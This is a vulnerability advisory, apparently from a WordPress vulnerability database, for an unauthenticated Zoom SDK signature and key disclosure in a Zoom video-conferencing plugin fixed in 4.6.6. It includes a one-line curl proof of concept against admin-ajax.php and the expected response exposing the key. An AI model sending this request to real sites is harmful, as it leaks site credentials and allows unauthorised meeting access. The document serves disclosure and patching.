Video Conferencing with Zoom API < 4.6.6 – Unauthenticated SDK Signature Generation | CVE 2026-1368 | Plugin Vulnerabilities

Description

The plugin contains an AJAX handler that has its nonce verification commented out, allowing unauthenticated attackers to generate valid Zoom SDK signatures for any meeting ID and retrieve the site's Zoom SDK key.

Proof of Concept

1. Configure Zoom SDK key and secret in plugin settings
2. Log out from WordPress
3. Send unauthenticated AJAX request with any meeting ID
4. Observe that valid SDK signature and key are returned

```
curl -s -X POST "http://example.com/wp-admin/admin-ajax.php" \
  -d "action=get_auth&meeting_id=123456789"
```

Expected Response (when SDK configured):

{
  "success": true,
  "data": {
    "sig": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...",
    "key": "YOUR_SDK_KEY_EXPOSED",
    "type": "sdk"
  }
}

Impact:

Attackers can generate valid Zoom SDK signatures for ANY meeting ID

Affects Plugins

video-conferencing-with-zoom-api

Fixed in 4.6.6

References

CVE

Classification

Type

AUTHBYPASS

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

yiğit ibrahim sağlam

Submitter

yiğit ibrahim sağlam

Submitter website

https://ibrahimsql.com

Submitter twitter

Verified

Yes

WPVDB ID

218e6655-c5aa-4bce-86b2-cad3bb20020c

Timeline

Publicly Published

2026-01-28 (about 1 month ago)

Added

2026-01-28 (about 1 month ago)

Last Updated

2026-01-28 (about 1 month ago)

Other

Published

Title

Published

2018-11-27

Title

Woo Confirmation Email < 3.2.0 - Missing Access Controls to View Uploaded files

Published

2025-09-19

Title

SupportCandy < 3.3.8 - Authentication Bypass to Support Session Takeover

Published

2014-08-01

Title

WordPress <= 3.0.5 wp-admin/press-this.php Privilege Escalation

Published

2014-08-01

Title

MaxButtons 1.19.0 - includes/maxbuttons-button-css.php Authentication Bypass

Published

2015-03-19

Title

All-in-One WP Migration < 2.0.5 - Unauthenticated Database Export